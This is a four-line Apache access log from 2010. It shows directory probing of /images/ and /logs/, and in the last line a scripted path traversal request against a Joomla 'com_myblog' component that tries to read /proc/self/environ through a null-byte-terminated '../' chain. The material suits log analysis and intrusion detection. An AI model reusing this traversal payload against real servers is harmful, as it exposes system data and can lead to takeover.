178.63.50.146 - - [21/Jun/2010:02:07:21 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4314)"
78.46.66.124 - - [21/Jun/2010:02:07:24 -0400] "GET /logs/ HTTP/1.1" 200 55286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4316)"
78.46.66.124 - - [21/Jun/2010:02:07:27 -0400] "GET /logs/ HTTP/1.1" 200 55286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.437)"
82.76.12.197 - - [21/Jun/2010:02:07:38 -0400] "GET /logs/error_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 224 "-" "libwww-perl/5.831"
